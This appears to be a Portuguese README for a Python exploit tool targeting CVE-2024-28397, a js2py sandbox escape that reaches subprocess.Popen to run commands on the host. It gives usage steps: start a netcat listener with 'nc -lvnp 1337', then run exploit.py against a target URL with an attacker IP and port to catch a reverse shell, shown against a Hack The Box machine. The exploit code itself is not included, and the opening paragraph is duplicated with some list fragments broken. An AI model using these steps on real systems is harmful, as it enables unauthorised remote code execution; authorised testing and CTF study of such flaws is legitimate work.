
Um script de automação em Python para explorar a vulnerabilidade **js2py Sandbox Escape** (CVE-2024-28397). Esta ferramenta automatiza o processo de geração e entrega de payload para alcançar Execução Remota de Código (RCE) em instâncias vulneráveis.
Um script de automação em Python para explorar a vulnerabilidade js2py Sandbox Escape (CVE-2024-28397). Esta ferramenta automatiza o processo de geração e entrega de payload para obter Execução Remota de Código (RCE) em instâncias vulneráveis.
⚠️ Aviso Legal O uso desta ferramenta para atacar alvos sem consentimento mútuo prévio é ilegal. Este repositório é apenas para fins educacionais. O autor não é responsável por qualquer uso indevido destas informações. Esta ferramenta destina-se a ser utilizada em avaliações de segurança autorizadas e ambientes Capture The Flag (CTF).
CVE-2024-28397 afeta a biblioteca js2py (versões < 0.74). A biblioteca falha em isolar adequadamente o ambiente JavaScript do ambiente Python hospedeiro.
__class__ e __subclasses__.subprocess.Popen, permitindo a execução arbitrária de comandos no servidor hospedeiro.pip install requests
Inicie seu Netcat Listener:
nc -lvnp 1337
Execute o Script:
python3 exploit.py -u <url alvo> -i <ip atacante> -p <porta atacante>
Aqui está a ferramenta em ação contra um alvo vulnerável (Hack The Box - CodeTwo):
Executando o exploit para gerar o payload e acionar o callback:

Recebendo o reverse shell no listener:
